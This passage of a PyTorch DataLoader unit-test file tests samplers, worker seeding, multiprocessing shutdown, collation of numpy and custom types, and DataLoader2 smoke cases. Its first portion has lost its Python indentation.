            self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
        # [auto-batching & drop_last] test that workers exit gracefully
        workers = dataloader_iter._workers
        del dataloader_iter
        del dataloader
        try:
            for w in workers:
                w.join(JOIN_TIMEOUT)
                self.assertFalse(w.is_alive())
                self.assertEqual(w.exitcode, 0)
        finally:
            for w in workers:
                w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_seqential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# raise error when replacement=False and num_samples is not None
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=len(self.dataset)))
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=0))
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
    """len() of a with-replacement RandomSampler equals num_samples, and
    iteration (direct or via a DataLoader) agrees with it."""
    from torch.utils.data import RandomSampler
    # Deliberately oversample: 5 more draws than the dataset size.
    num_samples = len(self.dataset) + 5
    sampler = RandomSampler(self.dataset,
                            replacement=True,
                            num_samples=num_samples)
    # __len__ must report the requested number of draws ...
    self.assertEqual(num_samples, len(sampler))
    # ... and iterating must actually produce exactly that many indices.
    drawn = sum(1 for _ in sampler)
    self.assertEqual(num_samples, drawn)
    # With batch_size=1 the dataloader yields one batch per sample.
    self.assertEqual(
        num_samples,
        len(self._get_data_loader(self.dataset, batch_size=1, sampler=sampler)))
    # With a larger batch size the batch count rounds up.
    batch_size = 6
    self.assertEqual(
        int(math.ceil(float(num_samples) / batch_size)),
        len(self._get_data_loader(self.dataset, batch_size=batch_size, sampler=sampler)))
def test_distributed_sampler_invalid_rank(self):
    """DistributedSampler must reject ranks outside [0, num_replicas)."""
    from torch.utils.data.distributed import DistributedSampler
    dataset = torch.IntTensor(range(10))
    # rank == num_replicas (one past the valid range).
    # Note: the constructor result is intentionally discarded — binding it
    # to an unused local (as before) only triggered lint warnings.
    with self.assertRaisesRegex(ValueError, "Invalid rank"):
        DistributedSampler(dataset, 3, 3)
    # Negative rank.
    with self.assertRaisesRegex(ValueError, "Invalid rank"):
        DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
    """With drop_last=True, DistributedSampler shards must not overlap."""
    from torch.utils.data.distributed import DistributedSampler
    world_size = 4
    total = 9
    data_set = torch.IntTensor(range(total))
    seen = torch.IntTensor([])
    for rank in range(world_size):
        shard_sampler = DistributedSampler(data_set, world_size, rank)
        loader = self._get_data_loader(data_set,
                                       batch_size=int(total / world_size),
                                       drop_last=True,
                                       sampler=shard_sampler)
        for batch in loader:
            seen = torch.cat((seen, batch), 0)
    # No element may appear in more than one rank's shard.
    self.assertEqual(seen.size(), seen.unique().size())
def test_sampler_reproducibility(self):
    """Samplers must be reproducible: identical with an identically-seeded
    explicit generator, and identical across reseeds of the global RNG."""
    from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
    weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
    # With an explicit generator seeded the same way, two freshly built
    # samplers must produce identical sequences.
    for fn in (
        lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
        lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
        lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
        lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
        lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
    ):
        self.assertEqual(list(fn()), list(fn()))

    for sampler in (
        RandomSampler(self.dataset, num_samples=5, replacement=True),
        RandomSampler(self.dataset, replacement=False),
        WeightedRandomSampler(weights, num_samples=5, replacement=True),
        WeightedRandomSampler(weights, num_samples=5, replacement=False),
        SubsetRandomSampler(range(10)),
    ):
        # Without an explicit generator the sampler draws from the global
        # RNG, so reseeding it must reproduce the sequence (including a
        # second pass over the same sampler object) ...
        torch.manual_seed(0)
        l1 = list(sampler) + list(sampler)

        torch.manual_seed(0)
        l2 = list(sampler) + list(sampler)
        self.assertEqual(l1, l2)

        # ... and two interleaved iterators, each started right after a
        # manual_seed(0) on their first step, must stay in lockstep.
        its = (iter(sampler), iter(sampler))
        ls = ([], [])
        for idx in range(len(sampler)):
            for i in range(2):
                if idx == 0:
                    torch.manual_seed(0)
                ls[i].append(next(its[i]))
        self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
    """Drive the loader with a plain iterable of indices (2..11) as the
    sampler and check every size-2 batch against the matching data slice."""
    dl = self._get_data_loader(self.dataset, sampler=range(2, 12), batch_size=2, **kwargs)
    self.assertEqual(len(dl), 5)
    for batch_idx, (input, _target) in enumerate(dl):
        start = batch_idx * 2 + 2  # sampler starts at index 2
        self.assertEqual(len(input), 2)
        self.assertEqual(input, self.data[start:start + 2])
def test_sampler(self):
    """Run the plain-sampler checks serially, with workers, and (where
    supported) with the 'spawn' multiprocessing start method."""
    self._test_sampler()
    self._test_sampler(num_workers=4)
    if not NO_MULTIPROCESSING_SPAWN:
        # Bug fix: this previously called `_test_batch_sampler` (copy-paste
        # from `test_batch_sampler` below), so the plain-sampler path was
        # never exercised under the spawn start method.
        self._test_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
    """Feed a hand-built batch_sampler that alternates batches of 2 and 3
    consecutive indices: [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]."""
    batches = []  # a plain iterable of index tuples, not a BatchSampler
    for start in range(0, 20, 5):
        batches.append(tuple(range(start, start + 2)))
        batches.append(tuple(range(start + 2, start + 5)))
    dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
    self.assertEqual(len(dl), 8)
    for i, (input, _target) in enumerate(dl):
        # Each 2-batch/3-batch pair covers 5 consecutive indices.
        offset = i * 5 // 2
        expected_len = 2 if i % 2 == 0 else 3
        self.assertEqual(len(input), expected_len)
        self.assertEqual(input, self.data[offset:offset + expected_len])
def test_batch_sampler(self):
    """batch_sampler path: serial, multi-worker, and spawn (if available)."""
    configs = [{}, {'num_workers': 4}]
    if not NO_MULTIPROCESSING_SPAWN:
        configs.append({'num_workers': 4, 'multiprocessing_context': 'spawn'})
    for kwargs in configs:
        self._test_batch_sampler(**kwargs)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
    """pin_memory=True must pin both inputs and targets of every batch."""
    loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True,
                                   num_workers=4, pin_memory=True)
    for batch in loader:
        # batch is the (input, target) pair produced by default collation.
        for tensor in batch:
            self.assertTrue(tensor.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
    """float64 numpy samples must collate into a torch.DoubleTensor batch."""
    import numpy as np

    class NumpyDataset(torch.utils.data.Dataset):
        def __getitem__(self, i):
            # np.ones defaults to float64, so the collated batch is double.
            return np.ones((2, 3, 4)) * i

        def __len__(self):
            return 1000

    loader = self._get_data_loader(NumpyDataset(), batch_size=12)
    batch = next(iter(loader))
    self.assertIsInstance(batch, torch.DoubleTensor)
    self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
    """Check `_generate_state` against reference values previously produced
    with NumPy, for a fixed set of (worker_id, base_seed) pairs."""
    from torch.utils.data._utils.worker import _generate_state
    # Using NumPy generated states as the reference to test `_generate_state`
    # having the same result.
    # Test case: ((worker_id, base_seed), expected_state)
    test_cases = [
        ((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
        ((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
        ((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
        ((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
        ((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
        ((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
        ((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
        ((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
        ((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
        ((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
        ((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
        ((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
        ((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
        ((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
        ((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
        ((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
    ]
    for (worker_id, base_seed), exp in test_cases:
        self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
    """Dataset errors must propagate out of single-process iteration."""
    loader = self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True)
    self._test_error(loader)
def test_error_workers(self):
    """Dataset errors raised inside workers must reach the main process."""
    loader = self._get_data_loader(ErrorDataset(41), batch_size=2,
                                   shuffle=True, num_workers=4)
    self._test_error(loader)
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
    r"""Check that workers exit even if the iterator is not exhausted."""
    # Run with and without pin_memory: the pin-memory thread is an extra
    # resource that must also shut down. Pinning requires CUDA.
    if TEST_CUDA:
        pin_memory_configs = (True, False)
    else:
        pin_memory_configs = (False,)

    for pin_memory in pin_memory_configs:
        loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
        # Keep references to the loader's internals so their shutdown can
        # be observed after the loader itself is dropped.
        workers = loader._workers
        if pin_memory:
            pin_memory_thread = loader._pin_memory_thread
        for i, _ in enumerate(loader):
            if i == 10:
                break
        assert i == 10
        # Dropping the partially-consumed iterator must tear everything down.
        del loader
        for w in workers:
            w.join(JOIN_TIMEOUT)
            self.assertFalse(w.is_alive(), 'subprocess not terminated')
        if pin_memory:
            pin_memory_thread.join(JOIN_TIMEOUT)
            self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
    (r'''There might be ConnectionResetError or leaked semaphore warning '''
     r'''(due to dirty process exit), but they are all safe to ignore''')

    # TODO: test the case where the pin_memory_thread triggers an
    # error/fatal signal. I haven't found out how to properly do that.

    # Sweep the full configuration space: dataset style, worker usage,
    # pinning, and whether a reference to the iterator is held.
    for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
            itertools.product([True, False], repeat=4):

        # `hold_iter_reference` specifies whether we hold a reference to the
        # iterator. This is interesting because Python3 error traces holds a
        # reference to the frames, which hold references to all the local
        # variables including the iterator, and then the iterator dtor may
        # not be called before process end. It is important to see that the
        # processes still exit in both cases.

        if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
            # This test runs in a subprocess, which can only initialize CUDA with spawn.
            # DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
            # For windows, pin_memory sometimes causes CUDA oom.
            continue

        # `exit_method` controls the way the loader process ends.
        # - `*_kill` means that `*` is killed by OS.
        # - `*_error` means that `*` raises an error.
        # - `None` means that no error happens.
        # In all cases, all processes should end properly.
        if use_workers:
            exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
            persistent_workers = self.persistent_workers
        else:
            exit_methods = [None, 'loader_error', 'loader_kill']
            persistent_workers = False

        for exit_method in exit_methods:
            if exit_method == 'worker_kill':
                # FIXME: This sometimes hangs. See #16608.
                continue

            # Human-readable description of this configuration, used to
            # prefix every failure message below.
            desc = []
            desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
            desc.append('use_workers={}'.format(use_workers))
            desc.append('pin_memory={}'.format(pin_memory))
            desc.append('hold_iter_reference={}'.format(hold_iter_reference))
            desc.append('exit_method={}'.format(exit_method))
            desc = 'test_proper_exit with ' + ', '.join(desc)

            # Event that the loader process uses to signal testing process
            # that various things are setup, including that the worker pids
            # are specified in `worker_pids` array.
            loader_setup_event = mp.Event()

            # Event that this process has finished setting up, and the
            # loader process can now proceed to trigger error events or
            # finish normally.
            tester_setup_event = mp.Event()

            loader_p = ErrorTrackingProcess(target=_test_proper_exit,
                                            args=(is_iterable_dataset, use_workers, pin_memory,
                                                  exit_method, hold_iter_reference,
                                                  loader_setup_event, tester_setup_event,
                                                  persistent_workers),
                                            disable_stderr=False)
            loader_p.start()
            loader_psutil_p = psutil.Process(loader_p.pid)

            # Wait for loader process to set everything up, e.g., starting
            # workers.
            loader_setup_event.wait(timeout=JOIN_TIMEOUT)
            if not loader_setup_event.is_set():
                fail_msg = desc + ': loader process failed to setup within given time'
                if loader_p.exception is not None:
                    fail_msg += ', and had exception {}'.format(loader_p.exception)
                elif not loader_p.is_alive():
                    fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
                else:
                    fail_msg += ', and is still alive.'
                if loader_p.is_alive():
                    # this may kill the process, needs to run after the above lines
                    loader_p.print_traces_of_all_threads()
                self.fail(fail_msg)

            # We are certain that the workers have started now.
            worker_psutil_ps = loader_psutil_p.children()

            def fail(reason):
                # Build a detailed failure message with the current state of
                # the loader process and all of its workers, then fail.
                report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
                                       'memory_full_info', 'num_ctx_switches',
                                       'open_files', 'threads', 'status',
                                       'nice', 'ionice']
                if reason is None:
                    err_msg = desc
                else:
                    err_msg = '{}: {}'.format(desc, reason)
                err_msg += '\nLoader info:\n\t'
                if loader_psutil_p.is_running():
                    err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
                    # this may kill the process, needs to run after the above line
                    loader_p.print_traces_of_all_threads()
                else:
                    err_msg += 'exited with code {}'.format(loader_p.exitcode)
                if use_workers:
                    err_msg += '\nWorker(s) info:'
                    for idx, worker_psutil_p in enumerate(worker_psutil_ps):
                        err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
                        if worker_psutil_p.is_running():
                            err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
                            # this may kill the process, needs to run after the above line
                            print_traces_of_all_threads(worker_psutil_p.pid)
                        else:
                            err_msg += 'exited with unknown code'
                self.fail(err_msg)

            # Let the loader process proceed to its exit scenario.
            tester_setup_event.set()

            try:
                loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
                if loader_p.is_alive():
                    fail_reason = 'loader process did not terminate'
                    if loader_p.exception is not None:
                        fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
                    else:
                        fail(fail_reason + ', and had no exception')
                _, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
                if len(alive) > 0:
                    fail('worker process (pid(s) {}) did not terminate'.format(
                        ', '.join(str(p.pid) for p in alive)))
                if exit_method is None:
                    if loader_p.exitcode != 0:
                        fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
                else:
                    if loader_p.exitcode == 0:
                        fail('loader process had zero exitcode')
                    if exit_method == 'loader_error':
                        if not isinstance(loader_p.exception, RuntimeError) or \
                                'Loader error' not in str(loader_p.exception):
                            fail('loader process did not raise expected exception, but had {}'.format(
                                loader_p.exception))
                    elif exit_method == 'worker_kill':
                        if isinstance(loader_p.exception, RuntimeError):
                            if 'DataLoader worker (pid' not in str(loader_p.exception):
                                fail('loader process did not raise expected exception, but had {}'.format(
                                    loader_p.exception))
                        elif isinstance(loader_p.exception, ConnectionRefusedError):
                            # Sometimes, when the worker is being killed and is freeing its
                            # resources, the unpickling in loader process will be met an
                            # a `ConnectionRefusedError` as it can not open a socket to receive
                            # resource. In such cases, the worker may not have fully exited,
                            # and the loader can't know this via `is_alive` check or `SIGCHLD`
                            # handler. So we permit this as an allowed error as well.
                            # After all, we are happy as long as it terminates.
                            pass
                        else:
                            fail('loader process did not raise expected exception, but had {}'.format(
                                loader_p.exception))
                    elif exit_method == 'worker_error':
                        if not isinstance(loader_p.exception, RuntimeError) or \
                                'Worker error' not in str(loader_p.exception):
                            fail('loader process did not raise expected exception, but had {}'.format(
                                loader_p.exception))
            finally:
                # Unconditionally reap the loader process.
                loader_p.terminate()
def test_len(self):
    """len(loader) must match both the expected value and the actual
    number of items produced by iteration."""
    def check_len(dl, expected):
        self.assertEqual(len(dl), expected)
        # Count again by exhausting the iterator.
        self.assertEqual(sum(1 for _ in dl), expected)

    check_len(self.dataset, 100)
    check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
    check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
    """For an IterableDataset with __len__, DataLoader.__len__ is
    ceil(len / batch_size), or floor(len / batch_size) with drop_last."""
    class IterableDataset(torch.utils.data.IterableDataset):
        def __len__(self):
            return 10

        def __iter__(self):
            return iter(range(10))

    # (batch_size, drop_last, expected_len) — same cases as before,
    # table-driven.
    cases = [
        (1, False, 10), (1, True, 10),
        (2, False, 5), (2, True, 5),
        (3, False, 4), (3, True, 3),
    ]
    for batch_size, drop_last, expected in cases:
        loader = DataLoader(IterableDataset(), batch_size=batch_size, drop_last=drop_last)
        self.assertEqual(len(loader), expected)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
    """Each numpy scalar dtype must collate into the matching tensor type."""
    import numpy as np

    class ScalarDataset(torch.utils.data.Dataset):
        def __init__(self, dtype):
            self.dtype = dtype

        def __getitem__(self, i):
            # Every sample is a default-constructed (zero) scalar.
            return self.dtype()

        def __len__(self):
            return 4

    dtype_to_tensor = {
        np.float64: torch.DoubleTensor,
        np.float32: torch.FloatTensor,
        np.float16: torch.HalfTensor,
        np.int64: torch.LongTensor,
        np.int32: torch.IntTensor,
        np.int16: torch.ShortTensor,
        np.int8: torch.CharTensor,
        np.uint8: torch.ByteTensor,
    }
    for np_dtype, tensor_cls in dtype_to_tensor.items():
        loader = self._get_data_loader(ScalarDataset(np_dtype), batch_size=2)
        self.assertIsInstance(next(iter(loader)), tensor_cls)
def test_default_convert_mapping_keep_type(self):
    """default_convert preserves custom Mapping subclasses."""
    original = CustomDict({"a": 1, "b": 2})
    self.assertEqual(_utils.collate.default_convert(original), original)
def test_default_convert_sequence_keep_type(self):
    """default_convert preserves custom Sequence subclasses."""
    original = CustomList([1, 2, 3])
    self.assertEqual(_utils.collate.default_convert(original), original)
def test_default_convert_sequence_dont_keep_type(self):
    """Sequences that cannot be rebuilt (e.g. range) convert to a list."""
    self.assertEqual(_utils.collate.default_convert(range(2)), [0, 1])
def test_default_collate_dtype(self):
    """default_collate infers int64 / float64 / bool tensors from Python
    scalars and passes string lists through untouched."""
    ints = [1, 2, -1]
    collated = _utils.collate.default_collate(ints)
    self.assertEqual(collated, torch.tensor(ints))
    self.assertEqual(collated.dtype, torch.int64)

    floats = [1.1, 2.3, -0.9]
    collated = _utils.collate.default_collate(floats)
    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
    self.assertEqualIgnoreType(collated, torch.tensor(floats))
    self.assertEqual(collated.dtype, torch.float64)

    bools = [True, False]
    collated = _utils.collate.default_collate(bools)
    self.assertEqual(collated, torch.tensor(bools))
    self.assertEqual(collated.dtype, torch.bool)

    # Should be a no-op
    strings = ['a', 'b', 'c']
    self.assertEqual(strings, _utils.collate.default_collate(strings))
def test_default_collate_mapping_keep_type(self):
    """Collating custom dicts keeps the dict subclass, values stacked."""
    batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
    expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
    self.assertEqual(_utils.collate.default_collate(batch), expected)
def test_default_collate_sequence_keep_type(self):
    """Collating custom lists keeps the list subclass, element-wise stacked."""
    batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
    expected = CustomList([
        torch.tensor([1, 4]),
        torch.tensor([2, 5]),
        torch.tensor([3, 6]),
    ])
    self.assertEqual(_utils.collate.default_collate(batch), expected)
def test_default_collate_sequence_dont_keep_type(self):
    """Collating ranges falls back to a plain list of tensors."""
    collated = _utils.collate.default_collate([range(2), range(2)])
    self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
    """1-D string arrays pass through; nested-string and object arrays raise."""
    import numpy as np
    # Should be a no-op: string arrays cannot become tensors and are
    # returned unchanged.
    arr = np.array(['a', 'b', 'c'])
    self.assertEqual(arr, _utils.collate.default_collate(arr))
    # Everything below contains an unsupported element type and must raise.
    for bad in (np.array([[['a', 'b', 'c']]]),
                np.array([object(), object(), object()]),
                np.array([[[object(), object(), object()]]])):
        self.assertRaises(TypeError, lambda bad=bad: _utils.collate.default_collate(bad))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
    """Memory-mapped numpy rows must collate like ordinary arrays."""
    import numpy as np
    with tempfile.TemporaryFile() as f:
        arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
        writable = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
        writable[:] = arr[:]
        # Re-open read-only so collation reads through the mapping.
        readonly = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
        tensor = _utils.collate.default_collate(list(readonly))
        self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
    """Ragged nested sequences must raise, regardless of element order."""
    batch = [['X'], ['X', 'X']]
    for candidate in (batch, batch[::-1]):
        with self.assertRaises(RuntimeError):
            _utils.collate.default_collate(candidate)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
    """In a worker process default_collate must place results in shared
    memory (cheap transfer to the parent); in the main process it must not."""
    import numpy as np
    t_in = torch.zeros(1)
    n_in = np.zeros(1)

    self.assertEqual(t_in.is_shared(), False)

    # Main process: no sharing expected.
    self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
    self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)

    # FIXME: fix the following hack that makes `default_collate` believe
    # that it is in a worker process (since it tests
    # `get_worker_info() != None`), even though it is not.
    old = _utils.worker._worker_info
    try:
        _utils.worker._worker_info = 'x'
        self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
        self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
    finally:
        # Always restore the real worker info, even on assertion failure.
        _utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
    """Constructing a DataLoader with an absurd num_workers must warn."""
    with self.assertWarnsRegex(
            UserWarning,
            r"excessive worker creation might get DataLoader running slow or even freeze"):
        # Construction alone triggers the warning; the loader is never
        # iterated, so the previous unused local binding was dropped.
        DataLoader(self.dataset, batch_size=2, num_workers=1000)
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2(TestCase):
    """Smoke tests comparing the prototype DataLoader2 with DataLoader."""

    @skipIfNoDill
    def test_basics(self):
        # TODO(VitalyFedyunin): This test will start breaking if we remove guaranteed order
        # of traversing workers
        dp = IterableWrapper(list(range(1000)))
        dl = DataLoader(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
        dl2 = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2)
        # Same pipeline driven through DataLoader2's thread-parallel mode.
        dl2_threading = DataLoader2(dp, batch_size=3, collate_fn=lambda x: x, num_workers=2, parallelism_mode='thread')
        self.assertEqual(list(dl), list(dl2))
        self.assertEqual(list(dl), list(dl2_threading))
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader2_EventLoop(TestCase):
    """Exercises the communication event loop: a datapipe served from a
    separate thread over request/response queues."""

    @skipIfNoDill
    def test_basic_threading(self):
        def clean_me(process, req_queue, res_queue):
            # Ask the serving thread to terminate and wait for it to exit.
            req_queue.put(communication.messages.TerminateRequest())
            _ = res_queue.get()
            process.join()

        it = list(range(100))
        numbers_dp = IterableWrapper(it)
        (process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(numbers_dp)

        process.start()
        # Client-side wrapper that forwards iteration over the queues.
        local_datapipe = communication.iter.QueueWrapper(
            communication.protocol.IterDataPipeQueueProtocolClient(req_queue, res_queue))

